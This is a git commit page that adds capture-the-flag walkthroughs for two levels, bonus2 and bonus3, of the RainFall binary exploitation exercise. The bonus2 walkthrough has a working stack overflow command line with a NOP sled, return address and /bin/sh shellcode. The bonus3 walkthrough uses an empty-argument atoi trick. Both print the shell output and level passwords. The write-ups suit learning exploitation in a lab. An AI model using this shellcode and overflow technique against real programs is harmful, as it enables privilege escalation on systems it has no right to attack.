gbrochar
/
RainFall
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

chore: walkthrough bonus2 and bonus3

This commit is contained in:
gbrochar 2025-05-20 13:25:05 +02:00
parent 183947e401
commit 9dca234a6a
2 changed files with 62 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
bonus2/Ressources/walkthrough.md Normal file
View File

@ -0,0 +1,40 @@
Using ghidra we notice LANG env variable is exploited and can be either fi, nl, or something else, defaulting to english. It calls a greeting function and uses both arguments. We'll set it to nl for now.
Fiddling a bit we can make the program segfault, and can make it segfault at any address
```
Starting program: /home/user/bonus2/bonus2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAA aaaaaaaaaaaaaaaaaaaaaaaXXXX
Goedemiddag! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaaaaaaaaaaaaaaaaaaaaXXXX
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb)
```
let's try to put a shellcode after the x.
We find the argv in the stack at address 0xbffff8c0.
our 'X's are at address 0xbffff919.
let's put our shellcode at 0xbffff920. That's 3 characters between the addresses and the shellcode.
it makes a strange behavior but doesn't work.
```
bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('A'*40)"` `python -c "print('a'*23+'\x20\xf9\xff\xbf'+'a'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"`
bonus2@RainFall:~$
```
let's try putting the shellcode in the first argument
```
bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('\x90'*100+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"` `python -c "print('a'*23+'\xe0\xf8\xff\xbf')"`
Goedemiddag! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>aaaaaaaaaaaaaaaaaaaaaaa<61><61><EFBFBD><EFBFBD>
$ whoami
bonus3
$ cat /home/user/bonus3/.pass
71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587
```
:)

22
bonus3/Ressources/walkthrough.md Normal file
View File

@ -0,0 +1,22 @@
We compare characters of argv[1] the string of the last flag.
But the string of the flag is shortened depending on the value of atoi(argv[1]). If we enter 14, the 14th characters is replaced by a zero.
So maybe we can put a 0, so the string of last flag becomes an empty string.
But then we are comparing "0\0" with "\0", which isn't equal.
Fortunately, atoi on an empty string also returns 0.
```
bonus3@RainFall:~$ ./bonus3 ""
$ whoami
end
$ cat /home/user/end/.pass
3321b6f81659f9a71c76616f606e4b50189cecfea611393d5d649f75e157353c
$ cd /home/user/end
$ cat end
Congratulations graduate!
```
:)